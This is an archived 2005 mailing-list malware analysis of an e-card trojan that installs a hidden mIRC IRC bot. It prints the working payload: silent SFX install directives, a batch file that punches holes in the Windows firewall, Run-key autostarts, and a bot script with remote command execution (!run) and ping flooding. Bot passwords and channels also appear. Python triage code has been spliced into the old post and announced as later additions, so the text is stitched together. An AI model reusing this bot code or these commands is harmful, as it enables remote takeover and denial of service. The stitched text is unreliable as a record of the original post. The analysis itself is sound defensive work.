[Dshield] Romanian Postcards 4 You (long)

jayjwa jayjwa at atr2.ath.cx
Sun Nov 20 03:48:22 GMT 2005



Recently there were "You have a postcard from someone you know, click here..." 
type emails spammed out in great numbers to several mailing lists. This one I 
found while reading a list for a GNU utility I was going to use to 
partition my shiny new 80GB hard disk. The "notices" look like this:


---------------------------------------------------------------


Hello friend !
You have just received a postcard from someone who cares about you!

This is a part of the message:
"Hy there! It has been a long time since I haven't heared about you!
I've just found out about this service from Claire, a friend of mine who also
told me that..."
If you'd like to see the rest of the message click here to receive your
animated postcard!

===================
Thank you for using www.postcard1000.com 's services !!!
Please take this opportunity to let your friends hear about us by sending them
a postcard from our collection !


---------------------------------------------------------------


It's dated 11/19/2005, so this is really current. This guy's really spamming 
the heck out of the list:

* You have received an electronic postcard., Best Postcards, 2005/11/18
   + You have received an electronic postcard., Best Postcards, 2005/11/19
   + You have received an electronic postcard., Best Postcards  2005/11/19
   + You have received an electronic postcard., Best Postcards, 2005/11/19
   + You have received an electronic postcard., Best Postcards, 2005/11/19
   + You have received an electronic postcard., Best Postcards, 2005/11/19


Under the "click here" is a link. There are numerous versions of this email, 
all the same but with a different link. The first 3 servers I checked were 
down already. The fourth one had the binary.

It's called "postcard.gif.exe", a massive bit o' malware weighing in at a 
whopping 748KB. F-Prot's IDs as of today don't do a lot for it, marking it only 
as a "possible" unknown virus. It's actually a trojan (no self-replication; it 
appears as something harmless and desirable, but contains something malicious).


f41b75a81c450af66cf507a40f475f75  postcard.gif.exe


What does it do? Well, since it's apparently from Romania (the first 3 servers 
were all in the .home.ro domain), one could rightly guess "something to do 
with IRC" and be correct. It uses the technique I wrote about in my 
paper, Self-Extracting Archives: Rar SFX As Malware Transport:


"First, some background: on Microsoft Windows at least (and I have not
been able to duplicate this with other OS platforms), it is possible
to transform a normal, compressed Rar (www.rarfiles.com) archive
into a self-extracting one, that is, one which will explode its
contents upon execution, complete with additional "instructions"
that are very similar to comments. Here however, these lines of
texts aren't for description of the archive's contents: they are
used as actual commands to execute *after* the archive itself is
expanded. It is this functionality that allows this technique to
be successful; no comment-commands and you're left with little
more than your average archive. These commands can take such a
form as seen here, below:

SavePath
Setup=C:\WINDOWS\system\svchost.exe
Setup=C:\WINDOWS\system\sup.bat
Silent=1
Overwrite=1

Notice that in addition to two files that shall get executed,
"svchost.exe" and "sup.bat", there are also two other commands
that seem to be almost custom-ordered for this technique, both
"Silent=1" and "Overwrite=1". The end result is the arbitrary
execution of several files, which have just been extracted from
the archive itself in which the user might very well have no
knowledge of, coupled with two additional parameters that
will ensure that the entire process is both silent (Silent=1)
and able to clobber existing files (Overwrite=1). In this
method the victim must still at some point execute the SFX
executable-stubbed binary."



So, if you run the binary, the files will install silently, at least on real 
Windows systems. I tried this under Wine on linux, and it didn't work. To open 
the archive, I use:

rar e postcard.gif.exe


RAR 3.50 beta 1   Copyright (c) 1993-2005 Alexander Roshal   30 Mar 2005
Shareware version         Type RAR -? for help

;Comentariul de mai jos conține comenzi SFX

Path=c:\windows\system32\drivers\shellz
SavePath
Setup=c:\windows\system32\drivers\shellz\setup.lnk
Silent=1
Overwrite=2


Solid SFX archive postcard.gif.exe


...and end up with the files in the current directory:

aliases.ini    fullname.txt  netinfo.bat       remote.ini    sup.bat
away.txt       hidewndw.exe  netinfo.lnk       script.ini    sup.reg
ident.txt      nicks.txt     servers2.ini      users.ini
fullinfo2.bat  ipconf.bat    postcard.gif.exe  servers.ini   winspector.exe
fullinfo2.lnk  ipconf.lnk    procese.bat       setup.lnk     winspector.lnk
fullinfo.bat   memorat.txt   procese.lnk       sup2.bat
fullinfo.lnk   mirc.ini      sup2.lnk
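To turn a dumped SFX comment like the one rar printed above into something a triage script can act on, here is an added Python example (mine, not code from the original post) that parses the directives and lists the findings an analyst would care about. The sample text is the comment block from postcard.gif.exe as shown above; the meaning of the Silent and Overwrite values follows WinRAR's SFX documentation as I recall it, and SYSTEM_DIRS is my own heuristic.

```python
import re

# SFX comment block copied from the rar output above (the page's own sample);
# lines are parsed the way WinRAR's SFX module reads them: key=value or bare flag.
SFX_COMMENT = """;Comentariul de mai jos contine comenzi SFX
Path=c:\\windows\\system32\\drivers\\shellz
SavePath
Setup=c:\\windows\\system32\\drivers\\shellz\\setup.lnk
Silent=1
Overwrite=2
"""

# Heuristic (mine): a legitimate installer SFX rarely drops straight into %WINDIR%.
SYSTEM_DIRS = re.compile(r"^[a-z]:\\windows\\", re.I)

def parse_sfx_comment(text):
    """Return (settings, setup): scalar/flag directives and the ordered Setup= commands."""
    settings, setup = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):      # ';' lines are plain comments
            continue
        key, _, value = line.partition("=")
        if key.lower() == "setup":
            setup.append(value)                    # executed after extraction, in order
        else:
            settings[key.lower()] = value          # bare flags such as SavePath get ""
    return settings, setup

def triage_sfx(text):
    """Each finding is one reason an analyst would flag this archive."""
    settings, setup = parse_sfx_comment(text)
    findings = []
    if setup:
        findings.append("runs %d command(s) after extraction: %s" % (len(setup), ", ".join(setup)))
    if settings.get("silent") not in (None, "0"):
        findings.append("Silent=%s hides the extraction dialog from the user" % settings["silent"])
    ow = settings.get("overwrite")
    if ow == "1":
        findings.append("Overwrite=1 clobbers existing files without asking")
    elif ow == "2":
        findings.append("Overwrite=2 silently keeps files already present")
    path = settings.get("path", "")
    if SYSTEM_DIRS.match(path):
        findings.append("extracts into a system directory: " + path)
    if "savepath" in settings:
        findings.append("SavePath remembers the destination for later runs")
    return findings
```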



Since virus scanners basically each make up their own names for stuff, it'll 
probably be more useful to describe what these files are. The bulk of this 
install is mIRC, a Win32 IRC client. The rest of the files help keep this client 
protected and hidden, and knock down the WinXP SP2 firewall.



postcard.gif.exe:: main binary, an SFX Rar solid archive
hidewndw.exe:: this is a tool to "hide windows on Windows", as the name implies.

*.lnk files::

  801 fullinfo2.lnk
  799 fullinfo.lnk
  795 ipconf.lnk
  797 netinfo.lnk
  797 procese.lnk
  583 setup.lnk
  585 sup2.lnk
  803 winspector.lnk
5960 total

Windows shortcut files (the W32 equivalent of symbolic links); they usually reference the hide-window binary.

winspector.exe:: mIRC itself, with an fserver


sup.bat:: WinXP SP2 Firewall shutdown, via netsh:

@echo off
@regedit /s c:\windows\system32\drivers\shellz\sup.reg
@netsh firewall set portopening protocol = all port = 6667 name = winspector mode = enable scope = all profile = all
@netsh firewall set portopening protocol = all port = 7000 name = winspector mode = enable scope = all profile = all
@netsh firewall set service type = all mode = enable scope = all profile = all
@netsh firewall set allowedprogram program = c:\windows\system32\drivers\shellz\winspector.exe mode = enable scope = all profile = all
@c:\windows\system32\drivers\shellz\winspector.lnk


Note the added directory: c:\windows\system32\drivers\shellz

This file loads sup.reg into the registry for autostart:

@regedit /s c:\windows\system32\drivers\shellz\sup.reg

sup.reg:: Registry changes


REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Winspector_s"="C:\\WINDOWS\\system32\\drivers\\shellz\\sup2.lnk"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Winspector"="C:\\WINDOWS\\system32\\drivers\\shellz\\winspector.lnk"
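As an added example (not part of the original post), a Python triage helper that reads the two dropped files shown above and reports the firewall holes sup.bat punches and the Run-key autostarts sup.reg adds. The embedded copies are taken from the listing above with the mail-wrapped netsh lines rejoined; the "drivers" path check is my own heuristic for this drop.

```python
import re

# sup.bat and sup.reg copied from the analysis above (netsh lines rejoined).
SUP_BAT = r"""@echo off
@regedit /s c:\windows\system32\drivers\shellz\sup.reg
@netsh firewall set portopening protocol = all port = 6667 name = winspector mode = enable scope = all profile = all
@netsh firewall set portopening protocol = all port = 7000 name = winspector mode = enable scope = all profile = all
@netsh firewall set service type = all mode = enable scope = all profile = all
@netsh firewall set allowedprogram program = c:\windows\system32\drivers\shellz\winspector.exe mode = enable scope = all profile = all
@c:\windows\system32\drivers\shellz\winspector.lnk
"""

SUP_REG = r"""REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Winspector_s"="C:\\WINDOWS\\system32\\drivers\\shellz\\sup2.lnk"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Winspector"="C:\\WINDOWS\\system32\\drivers\\shellz\\winspector.lnk"
"""

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)   # autostart keys
PORT = re.compile(r"port\s*=\s*(\d+)", re.I)
PROGRAM = re.compile(r"program\s*=\s*(\S+)", re.I)

def run_entries(reg_text):
    """(value name, target) for every value under a Run/RunOnce key in a REGEDIT4 dump."""
    out, in_run = [], False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_run = bool(RUN_KEY.search(line[1:-1]))   # key header: are we in Run?
        elif in_run and line.startswith('"'):
            name, _, value = line.partition("=")
            out.append((name.strip('"'), value.strip('"').replace("\\\\", "\\")))
    return out

def suspicious_run_entries(reg_text):
    """Heuristic (mine): autostarts pointing under system32\\drivers match this drop."""
    return [e for e in run_entries(reg_text) if "\\system32\\drivers\\" in e[1].lower()]

def firewall_changes(bat_text):
    """What the batch file does to the SP2 firewall: opened ports, allowed programs, reg imports."""
    ports, programs, imports = [], [], []
    for line in bat_text.splitlines():
        cmd = line.lstrip("@ ").lower()            # '@' only silences echo
        if cmd.startswith("netsh firewall set portopening"):
            ports.append(int(PORT.search(cmd).group(1)))
        elif cmd.startswith("netsh firewall set allowedprogram"):
            programs.append(PROGRAM.search(cmd).group(1))
        elif cmd.startswith("regedit /s"):         # silent registry import
            imports.append(cmd.split(None, 2)[2])
    return {"ports": ports, "programs": programs, "reg_imports": imports}
```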

ident.txt:: IDs for the fake identd server most IRC clients run. Originally 
identd was supposed to be the system's identd server, listening on port 113 for 
queries, but now many IRC clients run their own, which invariably reports "UNIX" 
even when the OS is not. The IDs used here are:

Lucian
Luci
uk
Luca
Luka
dur
Luchian
Lucien
Lucifer
Lucius
englezu
ukrullz
io
yo
rullz

away.txt:: "Away" messages for the IRC client, many color control chars, 
stating "The Legend Will Live Forever !!! ;-)"


memorat.txt:: This guy is infatuated with word play on his name, no? He'll use 
these to log in to X, which is a channel service on Undernet. 
Malware bots on Undernet?? No way!

uk ramanlegenda ramanlegendalucianc++
Elena byuk byuklucianc++
Luc ciudatu ciudatulucianc++
Luca cizda cizdalucianc++
Luchian saveas saveaslucianc++
Luci iubito iubitolucianc++
Lucian 0x100 0x100lucianc++
Lucien NuMaLasaMama NuMaLasaMamalucianc++
Lucifer NightsOnFire lucianc++
Lucius ihaveadream ihaveadreamlucianc++
Luka YouAreMyLife YouAreMyLifelucianc++
Leon Malefic Maleficlucianc++
Luke sentiment sentimentlucianc++


remote.ini:: passwords, channels?

[variables]
n0=%frate orfan
n1=%inichan1 #12:12 Lucian
n2=%inichan2 #24:24 Lucian
n3=%inichan3 #12:12 Lucian
n4=%passuk !c++ukro
n5=%passbotu !creioncolorat
n6=%autoop on
n7=%canal #12:12 Lucian



He uses the irc.undernet.org servers, referencing them by their exact names, 
these two:

eu.undernet.org
us.undernet.org

on ports 6667 and 7000.

channels

#12:12 Lucian
#24:24 Lucian


script.ini:: This is the inner workings of the bot; if you study it you can 
find out how it logs in, which channels he'll be in, login names, etc.

[script]
n0=on 1:connect:{
n1=  nick $read nicks.txt | timernick 2 10 nick $read nicks.txt
n2=  anick $read nicks.txt | timeranick 2 10 anick $read nicks.txt
n3=  writeini users.ini users n0 100:logout at logout
n4=  writeini users.ini users n1 99:logout at logout
n5=  writeini mirc.ini ident userid $read(ident.txt)
n6=  reload -ru users.ini
n7=  fullname $read(fullname.txt)
n8=  notify on
n9=  join %inichan1
n10=  join %inichan2
n11=  join %inichan3
n12=  timerpass 1 10 msg uk777ro zipass
n13=}
n14=
n15=on 1:unotify:{
n16=  timernick off
n17=  timeranick off
n18=  nick $nick
n19=  msg x at channels.undernet.org login $read(memorat.txt,s,$nick)
n20=  mode $nick +x
n21=  if ($nick != w) { silence *!*@* | join #12:12 Lucian }
n22=  away $read(away.txt,s,$nick $+ .)
n23=}
n24=
n25=
n26=on 1:JOIN:#: {
n27=  if (%autoop == on) { mode $chan +o $nick | halt }
n28=}
n29=
n30=on 1:text:*:*: {
n31=  if ($1 == %passuk) {
n32=    writeini users.ini users n0 100:*! $+ $2
n33=    reload -ru users.ini
n34=    msg $chan 12 $nick esti logat cu user UK
n35=  }
n36=  if ($1 == %passbotu) {
n37=    writeini users.ini users n1 99:*! $+ $2
n38=    reload -ru users.ini
n39=    msg $chan 12 $nick esti logat cu user botu
n40=  }
n41=  if ($1 == refreshparola) {
n42=    msg $nick refreshpassbotu %passbotu
n43=    msg $nick refreshpassuk %passuk
n44=  }
n45=  if ($1 == refreshpassbotu) {
n46=    set %passbotu $2
n47=  }
n48=  if ($1 == refreshpassuk) {
n49=    set %passuk $2
n50=  }
n51=
n52=}
n53=
n54=on 99:text:*:*: {
n55=  if ($1 == !passuk) { set %passuk $2 | msg $chan 12 Parola a fost schimbata cu succes! | halt }
n56=  if ($1 == !passbotu) { set %passbotu $2 | msg $chan 12 Parola a fost schimbata cu succes! | halt }
n57=  if ($1 == !logoutuk) { writeini users.ini users n0 100:logout at logout | reload -ru users.ini | msg $chan Logged out UK | halt }
n58=  if ($1 == !logoutbotu) { writeini users.ini users n1 99:logout at logout | reload -ru users.ini | msg $chan Logged out botu | halt }
n59=  if ($1 == !autoop) { set %autoop $2 | msg $chan 9,1/!\1,9 Autoop e $2 | halt }
n60=  if ($1 == !op) { if ($2 == $null) { .mode $chan +o $nick } | else { mode $chan +oooooooooooo $2- } | halt }
n61=  if ($1 == !deop) { if ($2 == $null) { .mode $chan -o $nick } | else { mode $chan -oooooooooooo $2- } | halt }
n62=  if ($1 == !ver) { .msg $chan $ver | halt }
n63=  if ($1 == !rnick) { .timer 1 0 nick $r(A,Z) $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(A,Z) | halt }
n64=  if ($1 == !ban) { mode $chan -o+b $2 $address($2,2) | kick $chan $2- ( $+ $nick $+ ) | halt }
n65=  if ($1 == !run) { run $2- | .notice $nick Am rulat ( $2- )  | halt } 
n66=  if ($1 == !msg) { .timer 1 1 msg $2- | halt }
n67=  if ($1 == !join) { join $2- | who $2 | halt }
n68=  if ($1 == !part) { part $2- | halt }
n69=  if ($1 == !take) { .notify $2 | .write memorat.txt $2-4 | .write away.txt $2 $+ . 1<4uk1> $+ $5- | .notice $nick Am inteles, sa traiti! ( $2 ) e ca si luat! | halt }
n70=  if ($1 == !let) { .notify -r $2 | .write -ds $2 memorat.txt | .write -ds $2 $+ . away.txt | .notice $nick Am inteles, sa traiti! ( $2 ) e istorie! | halt }
n71=  if ($1 == !me) { describe $chan $2- | halt }
n72=  if ($1 == !ame) { ame $2- | halt }
n73=  if ($1 == !quit) { .timer 1 0 quit $2- | halt }
n74=  if ($1 == !say) { .timer 1 0 msg $chan $2- | halt }
n75=  if ($1 == !who) { .whois $me | set %canal $chan }
n76=  if ($1 == !flood) { run ping -n $3 -l $4 -w 2000 $2 | run c:\windows\system32\drivers\shellz\hidewndw.exe /n /fh c:\windows\system32\ping.exe | msg $chan 12 Floodam $2 cu $4 ! | halt }
n77=  if ($1 == !gemeni) { if (%frate == orfan) { server -m | set %frate exista | .msg $chan 12Dau la buci si... | halt } | else { .msg $chan 4Am dat deja la buci!!! ;) | halt } }
n78=  if ($1 == !ctcp) { .ctcp $2- | halt } 
n79=  if ($1 == !raw) {
n80=    $$2-
n81=    if ($1 == !staiincap) { .msg $chan 1,8 Stau in cap master $nick !!! }
n82=  }
n83=  if ($1 == $me) {
n84=    if ($2 == !op) { if ($3 == $null) { .mode $chan +o $nick } | else { mode $chan +oooooooooooo $3- } | halt }
n85=    if ($2 == !deop) { if ($3 == $null) { .mode $chan -o $nick } | else { mode $chan -oooooooooooo $3- } | halt }
n86=    if ($2 == !ver) { .msg $chan $ver | halt }
n87=    if ($2 == !rnick) { .timer 1 0 nick $r(A,Z) $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(A,Z) | halt }
n88=    if ($2 == !ban) { mode $chan -o+b $3 $address($3,2) | kick $chan $3- ( $+ $nick $+ ) | halt }
n89=    if ($2 == !run) { run $3- | .notice $nick Am rulat ( $3- )  | halt } 
n90=    if ($2 == !msg) { .timer 1 1 msg $3- | halt }
n91=    if ($2 == !join) { join $3- | who $3 | halt }
n92=    if ($2 == !part) { part $3- | halt }
n93=    if ($2 == !take) { .notify $3 | .write memorat.txt $3-5 | .write away.txt $3 $+ . 1<4uk1> $+ $6- | .notice $nick Am inteles, sa traiti! ( $3 ) e ca si luat! | halt }
n94=    if ($2 == !let) { .notify -r $3 | .write -ds $3 memorat.txt | .write -ds $3 away.txt | .notice $nick Am inteles, sa traiti! ( $3 ) e istorie! | halt }
n95=    if ($2 == !me) { describe $chan $3- | halt }
n96=    if ($2 == !ame) { ame $3- | halt }
n97=    if ($2 == !quit) { .timer 1 0 quit $3- | halt }
n98=    if ($2 == !say) { .timer 1 0 msg $chan $3- | halt }
n99=    if ($2 == !who) { .whois $me | set %canal $chan }
n100=    if ($2 == !flood) run ping -n $4 -l $5 -w 2000 $3
n101=    if ($2 == !gemeni) { if (%frate == orfan) { server -m | set %frate exista | .msg $chan 12Dau la buci si... | halt } | else { .msg $chan 4Am dat deja la buci!!! ;) | halt } }
n102=    if ($2 == !ctcp) { .ctcp $3- | halt } 
n103=    if ($2 == !raw) {
n104=      $$3-
n105=    }
n106=
n107=    if ($2 == !fullinfo) {
n108=      /run fullinfo.lnk
n109=      /msg $chan 8,1/!\1,8 Actualizez datele...(5 sec.)
n110=      /timerinfo 1 5 {
n111=        //msg $chan $read(fullinf.txt , 1)
n112=        //msg $chan $read(fullinf.txt , 2)
n113=        //msg $chan $read(fullinf.txt , 3) - $os
n114=        //msg $chan $read(fullinf.txt , 4)
n115=        //msg $chan $read(fullinf.txt , 5)
n116=        //msg $chan $read(fullinf.txt , 6)
n117=        //msg $chan $read(fullinf.txt , 7)
n118=        //msg $chan $read(fullinf.txt , 8)
n119=        //msg $chan $read(fullinf.txt , 9)
n120=      }
n121=      /halt
n122=    }
n123=    if ($2 == !fullinfo2) {
n124=      /run fullinfo2.lnk
n125=      /msg $chan 8,1/!\1,8 Actualizez datele...(10 sec.)
n126=      /timerip 1 10 play $chan fullinfo2.txt 2000
n127=      /halt
n128=    }
n129=
n130=    if ($2 == !ipconf) {
n131=      /run ipconf.lnk
n132=      /msg $chan 8,1/!\1,8 Actualizez datele...(10 sec.)
n133=      /timerip 1 10 play $chan ipinf.txt 2000
n134=      /halt
n135=    }
n136=    if ($2 == !netinfo) {
n137=      /run netinfo.lnk
n138=      /msg $chan 8,1/!\1,8 Actualizez datele...(10 sec.)
n139=      /timernet 1 10 play $chan netinf.txt 2000
n140=      /halt
n141=    }
n142=    if ($2 == !procese) {
n143=      /run procese.lnk
n144=      /msg $chan 8,1/!\1,8 Actualizez datele...(10 sec.)
n145=      /timernet 1 10 play $chan procese.txt 2000
n146=      /halt
n147=    }
n148=
n149=  }
n150=}
n151=
n152=
n153=on 100:quit: { writeini users.ini users n0 100:logout at logout | halt }
n154=on 99:quit: { writeini users.ini users n1 99:logout at logout | halt }
n155=
n156=
n157=on 1:EXIT:set %frate orfan
n158=raw 312:*:msg %canal 12 $3-
n159=
n160=
n161=alias ver return 8,12Rulez pe:4,0 $os 8,12de:4,0 $uptime(server,1) !
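An added example, not from the original post: a small Python parser over an excerpt of the script.ini above that strips the nN= ini numbering, tracks which "on LEVEL:event" block each !command trigger sits in, and reports the triggers that reach mIRC's /run (arbitrary program execution) together with the lowest user level that can use them. The excerpt is copied from the script above; the regexes are mine and cover only the trigger style this bot uses.

```python
import re

# Excerpt of the bot's script.ini copied from the analysis above. The 'nN='
# prefixes are mIRC's ini numbering, not part of the script itself.
SCRIPT_INI = r"""[script]
n0=on 1:text:*:*: {
n1=  if ($1 == %passuk) {
n2=    writeini users.ini users n0 100:*! $+ $2
n3=  }
n4=}
n5=on 99:text:*:*: {
n6=  if ($1 == !run) { run $2- | .notice $nick Am rulat ( $2- )  | halt }
n7=  if ($1 == !flood) { run ping -n $3 -l $4 -w 2000 $2 | run c:\windows\system32\drivers\shellz\hidewndw.exe /n /fh c:\windows\system32\ping.exe | msg $chan 12 Floodam $2 cu $4 ! | halt }
n8=  if ($1 == !say) { .timer 1 0 msg $chan $2- | halt }
n9=  if ($1 == $me) {
n10=    if ($2 == !run) { run $3- | .notice $nick Am rulat ( $3- )  | halt }
n11=  }
n12=}
"""

EVENT = re.compile(r"^on\s+(\d+):(\w+):")            # top-level 'on LEVEL:event:' header
TRIGGER = re.compile(r"\$(?:1|2)\s*==\s*(!\w+)")      # '$1 == !cmd' or nested '$2 == !cmd'
RUNS_PROGRAM = re.compile(r"(?:^\s*|[{|]\s*)/?run\s")  # mIRC /run launches an external program

def strip_ini_numbering(text):
    """Drop the 'nN=' prefixes and section headers; what remains is plain mIRC script."""
    return [re.sub(r"^n\d+=", "", l) for l in text.splitlines() if not l.startswith("[")]

def command_table(text):
    """Map each '!command' trigger to (lowest access level, event, launches external program?)."""
    table, level, event = {}, 0, None
    for line in strip_ini_numbering(text):
        m = EVENT.match(line)
        if m:                                           # entering a new event block
            level, event = int(m.group(1)), m.group(2).lower()
            continue
        for trig in TRIGGER.findall(line):
            runs = bool(RUNS_PROGRAM.search(line))
            prev = table.get(trig)
            table[trig] = (min(level, prev[0]) if prev else level,
                           event,
                           runs or (prev[2] if prev else False))
    return table

def dangerous_commands(text):
    """Triggers that give the operator program execution, with the level needed to use them."""
    return sorted((t, lvl) for t, (lvl, ev, runs) in command_table(text).items() if runs)
```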


us.undernet.org has address 66.198.80.67
us.undernet.org has address 69.16.172.34
us.undernet.org has address 66.197.0.145

IRC Server's contact:

ip-addr at teleglobe.ca
easynews.net (no abuse contact listed, likely abuse at easynews.net)
abuse at carpathiahost.com

Binary hosting server's contact:

abuse at cdp.pl

jjj.cebzranqn.pbz/cbfgpneq.tvs.rkr




-- 
    / /     __  __  __  __  __ __  __  mail me for my *
   / /__   / / /  \/ / / /_/ / \ \/ /  * email address.
  /_____/ /_/ /_/\__/ /_____/  /_/\_\ ::[ATr2 RG 2005]::
============================================================
IF you have to request that people contact you via a WEBFORM
because you've blocked off virtually all smtp-sent email from
your own MTA  ...You just might be guilty of DNS-RBL abuse.

